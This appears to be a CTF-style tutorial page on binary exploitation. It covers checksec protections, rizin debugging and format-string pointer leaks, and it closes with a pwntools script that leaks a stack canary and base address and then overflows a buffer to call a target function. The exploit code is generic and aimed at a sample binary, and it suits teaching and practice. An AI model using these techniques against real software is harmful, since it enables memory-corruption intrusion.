Binary Exploitation
Last modified: 2023-03-20
Binary Exploitation is the process of finding vulnerabilities in the binary file.
Prerequisites
This post uses “rizin” for dynamic analysis.
And “pwntools” python package is useful for binary exploitation.
Investigation
Basic
file ./example
strings ./example
objdump -d ./example
# -M: type
objdump -M intel -d ./example
Security Properties
First check the executable properties.
checksec --file=./example
-
RELRO (stands for Relocation Read-Only)
- Partial RELRO - We can read/write the global offset table.
- Full RELRO - We can only read the global offset table. So we cannot overwrite GOT.
-
STACK CNARY
- No canary found - It’s vulnerable to buffer overflow.
-
NX (stands for Non-eXecutable segments)
- NX enabled - We cannot execute custom shellcode from the stack.
-
PIE (stands for Position Independent Executable)
- No PIE - The binary always starts at same address.
ASLR (Address Space Layout Randomization) in Machine
ASLR is a security technique involved in preventing exploitation of memory corruption vulnerabilities.
cat /proc/sys/kernel/randomize_va_space
2
- 0 - The address space is NOT randomized.
- 1 - The address space is randomized.
- 2 - The address space is randomized, and data segment as well.
Debugging
1. Start Debugger
# Change permission for debugging
chmod +x example
# -d: Debug mode
rizin -d example
2. Analyzing
# Analyze all calls, references, emulation and applies signatures
[0x0000]> aaa
3. List functions
# List functions
[0x0000]> afl
[0x0000]> afl | grep main
4. Disassemble & Decompile Functions
# Disassemble the function
[0x0000]> pdf @ main
[0x0000]> pd @ main
# Disassemble the first 50 lines
[0x0000]> pd 50 @ main
# Decompile the function (the ghidra plugin required)
[0x0000]> pdg @ main
If you want to decompile using “pdg” command as above, you need to install the “rizin-plugin-ghidra” so install it by running the following command.
sudo apt install rizin-plugin-ghidra
Format String (Pointer)
./example
Type something:
>> %2$p
The result is 0x555a18ae6365
Exploitation Examples
# Brute force pointer
for i in {20..-1}; do echo \%$i\$p | ./example; done
# Brute force pointer & cut & hexdump (reverse) & reverse
# cut -c 15-: Select only N characters (e.g. 15 characters)
# xxd -ps: Output in plain hexdump style
# xxd -r: Reverse operation. Convert hexdump into binary
# rev: Reverse lines characterwise
(for i in {11..6..-1}; do echo \%$i\$p | ./example; done) | grep "The result is" | cut -c 15- | xxd -ps -r | rev
Bypass Canary Protection
from pwn import *
import re
context.update(arch="amd64", os="linux")
filepath = "./example"
elf = context.binary = ELF(filepath)
p = process(filepath) # p = remote('example.com', '1337') for remote connection
# We need to find the stack canary. This address ends with "00".
# To find it, execute p.sendline(b"%p %p %p %p ...").
p.sendline(b"%10$p %13$p")
p.recvuntil(b"result: ")
leaked = p.recvline().split()
print(leaked)
base = int(leaked[0], 16) - 0xa90
canary = int(leaked[1], 16)
elf.address = base
payload = b"A"*24
payload += p64(canary)
payload += b"B"*8
payload += p64(base + 0x6fe)
payload += p64(elf.sym["target_func"])
p.sendline(payload)
p.interactive()